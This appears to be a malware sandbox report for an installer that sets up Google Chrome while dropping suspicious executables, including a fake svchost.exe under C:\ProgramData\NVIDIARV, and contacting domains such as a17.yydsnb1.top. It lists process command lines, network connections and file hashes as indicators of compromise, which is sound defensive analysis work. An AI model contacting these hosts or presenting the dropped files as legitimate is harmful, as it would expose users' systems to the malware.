"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\gui5409.tmp"

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\gui5409.tmp"

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff65770bed8,0x7ff65770bee4,0x7ff65770bef0

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff65770bed8,0x7ff65770bee4,0x7ff65770bef0

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MTExRDBBMzYtMDA3Ni00Mjk0LTg2MDEtNzAzQzVBNDJBQjM4fSIgdXNlcmlkPSJ7MEQ0QTE0OTgtMDBBOC00OEUwLUI0NzQtQ0JBMkQ5NTUxNjM5fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0JBN0MwNzg4LTJCNjgtNDNCOC05MzVFLUM2NTlFNjYyMjdDN30iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M0MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMzMuMC42OTQzLjEyNyIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpaWQ9Ins5RjBDMUY0NC0xQzUwLTM5NkEtNDgzQS0wOERBNDg5NkZGMEJ9IiBjb2hvcnQ9IjE6Z3UvaTE5OiIgY29ob3J0bmFtZT0iU3RhYmxlIEluc3RhbGxzICZhbXA7IFZlcnNpb24gUGlucyI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9lZGdlZGwubWUuZ3Z0MS5jb20vZWRnZWRsL3JlbGVhc2UyL2Nocm9tZS9hdTJuMzJoM2huY25jNWtjbjUyd3hheHp4YV8xMzMuMC42OTQzLjEyNy8xMzMuMC42OTQzLjEyN19jaHJvbWVfaW5zdGFsbGVyLmV4ZSIgZG93bmxvYWRlZD0iMTE4OTI5MjY0IiB0b3RhbD0iMTE4OTI5MjY0IiBkb3dubG9hZF90aW1lX21zPSIxMzE1NiIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNDY4IiBkb3dubG9hZF90aW1lX21zPSIxNDI1MCIgZG93bmxvYWRlZD0iMTE4OTI5MjY0IiB0b3RhbD0iMTE4OTI5MjY0IiBpbnN0YWxsX3RpbWVfbXM9IjMwMTI1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0xfc,0x100,0x104,0xa4,0x108,0x7ffa8ddefff8,0x7ffa8ddf0004,0x7ffa8ddf0010

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1720,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1976 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1948,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2296,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:13

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2932,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3152 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3648,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3660 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3708,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3712 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3268,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4696,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5464 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5472,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5532 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5516,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5500 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=2916,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3724 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3404,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3732 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3712,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4248 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=216,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3716 /prefetch:14

Network

Country Destination Domain Proto
US 8.8.8.8:53 a17.yydsnb1.top udp
US 8.8.8.8:53 a17.nbdsnb2.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
GB 216.58.201.99:443 o.pki.goog tcp
GB 216.58.201.99:443 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
GB 216.58.201.99:443 o.pki.goog tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 216.58.201.99:443 update.googleapis.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
GB 216.58.201.99:443 update.googleapis.com tcp
GB 216.58.201.99:443 update.googleapis.com udp

Files

C:\Windows\Installer\MSICEC9.tmp

MD5 c7fbd5ee98e32a77edf1156db3fca622
SHA1 3e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256 e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA512 8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

C:\Windows\Installer\MSID064.tmp

MD5 ae463676775a1dd0b7a28ddb265b4065
SHA1 dff64c17885c7628b22631a2cdc9da83e417d348
SHA256 83fbfcaff3da3eb89f9aec29e6574cf15502fd670cbb2ab0c8a84451b2598b22
SHA512 e47c2db249e7a08c5d2864671fbc235e48aebecbe0b2c2334d1a4cba1b5b3037522ff89408589f3559b3a1eaf507bd338645387d55800029bb3b941d4c7744d6

C:\Config.Msi\e57ce7e.rbs

MD5 72794475117b8cda35c556f3bc48e0cf
SHA1 c79a0c0b537176d83be5ef992612c3e63dfad7ea
SHA256 86b94d163e7fdc069c56904d81a46f520063b36e804cd5b1754b553b2cf2bbac
SHA512 4a3d1b9703e417bec394aa91b17cf3d0bf22fa5e742389bbe430e0725c0938314f7adeeb27f0206f845a5bd24ea6cd67b325d19d500f6120f793f08df4902af5

C:\ProgramData\setup\aa.exe

MD5 09c448be7e7d84e6e544cc03afbb05d8
SHA1 ddc13e71a72bc49c60f89b98cbb79c2449cfa07e
SHA256 a0f127a70943b0262060498c1723c795a8e2980f1acf0c42ee8c1dae72ae54b5
SHA512 e5f7a988a999e7e34d0aa2d2a5b2fbb22689588d3def4bed4518ceed38710e3714c5614bab192b0ce6bcac5172a87ebf3b3b923e495eb7344c70bd11f4bf1c12

C:\ProgramData\setup\ddd

MD5 9bd359e3956d119811c3a6abef58e644
SHA1 9f221781f406ebcb15fc2c02d5d259116155c734
SHA256 ead38673817c84de77a4d2fe6118e6a96f863e3db38f73518007caa2af676146
SHA512 7f817794728e532da07424c621eeef161501644d137068895391505d7110f1f8ee9dc76944946e3960f84e462c66fd82ee61b619ca91a07166aed5d3434f618b

memory/1528-64-0x0000000000400000-0x0000000000510000-memory.dmp

C:\ProgramData\Packas\scrok.exe

MD5 a03b2eaa4d517fd935bb0032d444f22d
SHA1 014864aac638b7c04b4d50e6c39d7266eafda773
SHA256 6fd145b1de7d0a143fd25274544d5e3c4ecee06cf3e31631d51cae8ca3e25f01
SHA512 68a253fcdb3cd1a086fe93fa7c8a7500d6b5414bdfc0dad555973697d4fb552e09088b849573f705ca91b1652ddd4572842b82d40f5821761b3ac299e465be51

memory/1744-68-0x00007FFAAEFD0000-0x00007FFAAEFD2000-memory.dmp

memory/1744-69-0x00007FF60F8D0000-0x00007FF60FE89000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

memory/1972-75-0x0000000000170000-0x0000000000246000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.xml

MD5 2c706293a3cfff8cc184a8e9a3b3da08
SHA1 873d7c9f51aa6cebd4ad3ae5930d1de84bb4437d
SHA256 ed28baf8be3a588d50ed246c2cd741bbd498aee74ea0675d57e0b33236e22067
SHA512 4aba3e25507ba5c29219ff51553f3616d07aeeb30f7465f9e921eea94cdcb411d1f48d1eefed647c22405df275e7f9d7506aac52202aae137391c6831463b043

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log

MD5 8005734c5c8a27f0225756ad8ab852df
SHA1 5a611231e25aa2a4dec287c01750da7fa743e981
SHA256 c7fe4d0b82bec7d44e817c76123b381269d494e2ff4a7f539ad53eb3ef5c4371
SHA512 d2c653d0c22503817c9176f93c5e330c9c0d4a244d2e254f9bc895955ef8630e5fd83b5c22459dee5f18a3e1e016a638918087106e54b2fd169b435030d7c60b

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 941ede9484eff0b69232f370231571d8
SHA1 8efb7d477425a95a7239aeead9c5ef30e86288af
SHA256 8b649c2c2f96bdd3255298b5809844b70faaa241a94c899d5658dd06606f6278
SHA512 be62a2e8bc5a1a0dd736c0ca3d6fe620fd30668c6af0e8aac423b5c8d8cbf9ca55404174fbc3223bbf9af295df95002bac7518ad0eaabb9c783b2b30885dee89

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 9fa2e5a09aa869d98881d4cda128b500
SHA1 b694b94f2f153387ea93ea73ef2fa43cdd5b5749
SHA256 0ca6331da4855f11f39e7c62ccc20bd24cee9daa79da5dac09ab897fbd1d38df
SHA512 e18e1c374778fe9ffdd71e9bf5149e2bc4d12060128500cb71d32e3d8fee32994e5c60585c2ca0b434e970ddba9a28782e27d6415f5ff37c2b825c8e09839af2

\??\Volume{50095574-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{18a162ea-5734-4694-9fd5-20be15eb218a}_OnDiskSnapshotProp

MD5 788d7ccf58473b9ffc7b0a2c9897a3c6
SHA1 2b111760471d1207c20e619e562f497760510fc8
SHA256 18fbdb39300aa849ca44ac6dade9177958ef15a8fe1fd0357fa5d0b2d154aea0
SHA512 f8fdbe60823d22c581fb11a8fa9d187563b47539febb0bc3b21a95c7d63bd5940e8889686283607a14daf90d7e20dfb7cd48ab51408f81fe70bcc8f3fa5e4354

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 71554600c12413b180f2daa5ae49537a
SHA1 c8c7ceec1cb2da07d7da9fd28207798ed68e54f1
SHA256 74ffbc95a6f4c9087318af5be2eafd0baaa7928fa90303303d9fe0adf7a1fa9b
SHA512 2a27d776539d55c7792099419fd21da639ce2c57492a39463d205e29a8a130ddc3d3456300fd8fe9bebe45d1ab1e3210734fd908c95ff332e4d65232f561a587

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 13f1c8aadf12d031b12250a853fa1bd8
SHA1 617c9f7cfc7e563009eac0e8a7521114cb4692d8
SHA256 b069e3f4f269fd1f8ce96b45f8a54273473f84286d6e24319e1661c6f42f75d5
SHA512 f3781d2922cad33e564de1076c3fc6efd392623bbc8197d8795ce9d77bcf5bea743023fbde79f19dd1c26771bcb7b4c12c4f4420087839735848288eb87f5093

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 9202d93f69096e5d559578eb1d88079a
SHA1 2a0a46d539bcfe7f3e91ba2a731cbfc897a47df4
SHA256 f69b03baced570e94107309d45b4b7363ecb9aaa2c77257a770a211b09f688ad
SHA512 056449f47961a7d942b0f667503776ebc80972f7fd17472dfbd4eb96875456b13f0b8e9b71557c55279c6560cb1e95489f5f1c37c4e83c2dc573c5df903f0ce2

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 1cfa188d5881a50f7e16cc80bddb05cc
SHA1 c283d3a262c43f2da942a17fd196d597fc1761e4
SHA256 da3eef6603ba90720277bb634046c120584edbef82283d7fd6d430bed761ebf8
SHA512 8bf5de87976a37479f7ace27bdd2ec9f3feb0e69c0e802d89f8aa0ed3c5beacc25c3e3b1ecb84668d636ed3c35bf57d1b959b8b02fc8a2c81fc6bb62571ca092

C:\ProgramData\Smart\setup.exe

MD5 118a9a9f6280e177fdac16989b8aa1a5
SHA1 fc37316439372be17a982d02cd0d294f7aaca751
SHA256 b995e6a0299f2465fd5881157aab1c6c9753c8e459efd661b9cd1e83be7e53f6
SHA512 14c731e7f7e9736f39d6c79a98bf1a3264da9dc76bab4faca82ec64f276f3d39c9bc4638991e30a06f52bf6204619f5da8c3168d11afe058e0c1d21a89d42878

memory/4776-114-0x00007FF60F8D0000-0x00007FF60FE89000-memory.dmp

memory/3780-118-0x0000000000400000-0x0000000000BA0000-memory.dmp

memory/3780-117-0x0000000000F00000-0x0000000000F01000-memory.dmp

C:\ProgramData\setup\setup.exe

MD5 4a94844260d6a08828d781d488cef61d
SHA1 de8169fdb5ab8a120df577d92eb25a2767431738
SHA256 46d7a8abe3bb9d7302529246cd8ee6e7d0360d1045fe92662cc7580e72ef5132
SHA512 82549c1e525a90003fb0174ebba2bc3b4f58706ef9fd5e6ee07d489ab536ef286e408db6c15a52b039d3f59c09bd55e35d045def79007da5d414d5d589d34f4f

C:\ProgramData\NVIDIARV\svchost.exe

MD5 4ce1a842d3d770f6fa4b4167542408b2
SHA1 43b0c03b176318ce2551d3dfc2c18e18f53c2240
SHA256 ba51980ef9681d849c9331e891cc411c1687d3c011f0acc01da9f4ef640764b6
SHA512 a28f0659af75da93f479359212dc4ffb9440f171cf89b19de929b7a8015b5e087ea53ab979dd6815597865538c79b1e3354e987940da88da4dfcf16bdf1f4337

memory/4680-219-0x0000000000400000-0x000000000090B000-memory.dmp

memory/4680-221-0x0000000010000000-0x000000001002D000-memory.dmp

memory/416-209-0x0000000010000000-0x000000001002D000-memory.dmp

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_zh-CN.dll

MD5 ca52cc49599bb6bda28c38aea1f9ec4e
SHA1 494f166b530444f39bca27e2b9e10f27e34fc98a
SHA256 f9f144aa2dc0de21b24c93f498a9b4a946b7da42819a776b3283a0bcae18544b
SHA512 05e2d5711eef8f57737b2512de2e73744f17e0a34de0bfd2a06c9cc60a08ebadbafe38e30b66a2ede7fa61d5b9571adddcfbd7e1cafcee1ab2168a563d2d3f0d

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdate.dll

MD5 dae72b4b8bcf62780d63b9cbb5b36b35
SHA1 1d9b764661cfe4ee0f0388ff75fd0f6866a9cd89
SHA256 b0ca6700e7a4ea667d91bcf3338699f28649c2e0a3c0d8b4f2d146ab7c843ab6
SHA512 402c00cab6dac8981e200b6b8b4263038d76afe47c473d5f2abf0406222b32fff727b495c6b754d207af2778288203ce0774a6200b3e580e90299d08ce0c098f

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe

MD5 cdf152e23a8cbf68dbe3f419701244fc
SHA1 cb850d3675da418131d90ab01320e4e8842228d7
SHA256 84eaf43f33d95da9ab310fc36dc3cfe53823d2220946f021f18cf3f729b8d64e
SHA512 863e1da5bc779fa02cf08587c4de5f04c56e02902c5c4f92a06f2e631380ecabcc98e35d52609f764727e41b965c0786d24ea23fc4b9776d24d9f13e0d8ae0c2

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_de.dll

MD5 96d92500b9a763f4b862c511c17e0a47
SHA1 2fd441eb8685d15e14fa6405e82359adea3e7148
SHA256 58829d135ff41e574ed5fc5e0421e4aa204267b02ca3ffaf08d8efb0a70fdd4c
SHA512 a1014584f1f278160d579848fa188f627676aee819e9395517490b00e273db6f583d7ddd31af6e35c9d251021df7fb26c88512aaa1c865c2ee3ba60c0a2db49a

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_es.dll

MD5 dae64d49ee97339b7327b52c9f720848
SHA1 15f159c4808f9e4fe6a2f1a4a19faa5d84ac630b
SHA256 e76400e62ae0ab31565e50b05d1001b775a91aa487a54dc90e53c0e103c717c2
SHA512 9ae72e5a658aa0e1fb261d62ccef474cd42d9bec2b4a50f71925d131ffea22b8f60fb961772587ce71cb30a32da3b7986e7483ecea960a509e0450d3983c84b0

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_en-GB.dll

MD5 f82ccf890c3ae14bfd7a263d07276e60
SHA1 6a915d6eb8c99d065e36a721d721d556b74bb377
SHA256 6b07a4fd3039541e30c68a8c31c371cda2cea480787f95e0ddbca3cc2fbff0cc
SHA512 4cbf9e6728e08de8d61f34b17bb20d92b6a699969edb9afa013fe962c8fd39238288adcd826134c9bca459904d8574a804c519daac6b301e0d38f68722c0359e

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_en.dll

MD5 741211652c66a8a6790396e1875eefa9
SHA1 2ccd5653b5fc78bcc19f86b493cef11844ba7a0c
SHA256 e0945deacdb6b75ff2587dea975774b9b800747e2ee3f3917e5b40ddb87eda10
SHA512 b70f847d8ca8828c89bbb67b543950fbd514c733cf62b52ad7fc0dab7b2168fe56d1f21bef3210f5c7f563f72831455d870a5f9aa6c557f1e3543ef7329c42f9

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_el.dll

MD5 ecdd26049573614b6f41d8a102ffcf21
SHA1 5140c6cff5d596267a64df1559ac36c4e8f49e42
SHA256 a3377520f2a95b8cc06bd30e493962c07f97eebf4661a69d03efb36b2ca515c5
